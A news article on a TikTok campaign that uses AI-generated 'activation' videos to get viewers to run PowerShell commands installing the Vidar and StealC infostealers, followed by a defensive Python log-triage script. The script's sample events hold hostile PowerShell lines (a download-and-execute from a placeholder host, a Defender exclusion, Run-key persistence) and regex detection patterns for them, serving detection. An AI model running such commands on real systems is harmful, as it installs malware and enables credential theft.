TikTok Infostealer Campaign Distributes Vidar and StealC via AI-Generated Videos

Written by: Lore Apostol, Cybersecurity & Streaming Writer

A novel infostealer campaign leverages TikTok’s wide reach and algorithmic virality to distribute the Vidar Stealer and StealC. Cybercriminals rely on social engineering, convincing users they are activating Windows, Microsoft Office, and premium features in CapCut and Spotify.

Unlike traditional malware campaigns that rely on phishing emails or compromised websites, this one uses TikTok, with AI-generated videos walking viewers through the steps that fetch the payload, according to the most recent TrendMicro report.

Threat actors create highly produced, faceless TikTok videos, often with AI-generated voice-overs, instructing viewers on how to "activate" popular software such as Windows, Office, or Spotify.

Screenshots showing the widespread exposure and potential impact of the campaign | Source: TrendMicro

The purported activation process requires users to run specific PowerShell commands as shown in the videos. Unbeknownst to the user, these PowerShell scripts fetch and execute malware-laden payloads from attacker-controlled servers.

The infection chain of the campaigns that lead to the Vidar and StealC malware | Source: TrendMicro

Notably, the delivery relies entirely on social engineering: no executable code is embedded on TikTok itself. The actionable instructions reach the victim through the video, which makes the campaign harder for platform-based security solutions to detect.

Contents of Steam profile leveraged as DDR | Source: TrendMicro

Upon execution, the PowerShell command creates hidden folders and alters security settings to evade detection.

It then downloads and runs Vidar or StealC malware, leveraging legitimate services like Steam and Telegram as Dead Drop Resolvers (DDR) to disguise command-and-control (C2) communications.

The attackers also establish persistence through registry modifications and clean up traces to hinder forensic discovery.
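As an added defender-side illustration (not part of the TrendMicro report or this article), the following Python triages PowerShell script-block log entries for the four stages described above, fetch-and-execute, hidden folder creation, altered security settings and registry persistence, and flags a host only when several stages co-occur. The host names, log lines, rule patterns and the threshold are constructed assumptions for the example, not indicators from the campaign.

```python
import re
from collections import defaultdict

# Constructed PowerShell script-block log entries (Event ID 4104 style), not
# commands from the campaign or the TrendMicro report. Each models one stage
# the article describes; the WS-02 entry is benign noise the rules should ignore.
SAMPLE_EVENTS = [
    {"host": "WS-01", "script": "iex (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER.example/a.ps1')"},
    {"host": "WS-01", "script": "New-Item -ItemType Directory $env:APPDATA\\cache | Out-Null; attrib +h +s $env:APPDATA\\cache"},
    {"host": "WS-01", "script": "Add-MpPreference -ExclusionPath $env:APPDATA\\cache"},
    {"host": "WS-01", "script": "Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name svc -Value $env:APPDATA\\cache\\u.exe"},
    {"host": "WS-02", "script": "Get-ChildItem $env:APPDATA | Sort-Object LastWriteTime"},
]

# One rule per stage named in the article: fetch-and-execute, hidden folder,
# weakened security settings, registry persistence. Patterns are illustrative.
RULES = {
    "download_and_execute": re.compile(
        r"(?i)(\biex\b|invoke-expression).*(downloadstring|downloadfile|invoke-webrequest|\biwr\b)"
        r"|(downloadstring|downloadfile|invoke-webrequest|\biwr\b).*(\biex\b|invoke-expression)"),
    "hidden_folder": re.compile(r"(?i)attrib\s+(\+[hs]\s+)*\+h|fileattributes\]::hidden|-Attributes\s+\S*Hidden"),
    "security_settings_altered": re.compile(r"(?i)(add|set)-mppreference|disablerealtimemonitoring"),
    "registry_persistence": re.compile(r"(?i)currentversion\\(run|runonce)\b"),
}


def classify(script: str) -> list[str]:
    """Return the stage names whose pattern matches this script block."""
    return [name for name, rx in RULES.items() if rx.search(script)]


def correlate(events, threshold: int = 3) -> dict[str, dict]:
    """Group matched stages per host and flag a host at `threshold` distinct stages.

    A single stage (for example one Defender exclusion) is common admin noise;
    several stages of the chain on the same host in one log window is the signal.
    """
    stages = defaultdict(set)
    for ev in events:
        stages[ev["host"]].update(classify(ev["script"]))
    return {
        host: {"stages": sorted(found), "flag": len(found) >= threshold}
        for host, found in stages.items()
    }


if __name__ == "__main__":
    for host, result in correlate(SAMPLE_EVENTS).items():
        print(host, result)
```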

These infostealers target a range of credentials and sensitive data, posing a serious risk to individual users and enterprises alike.
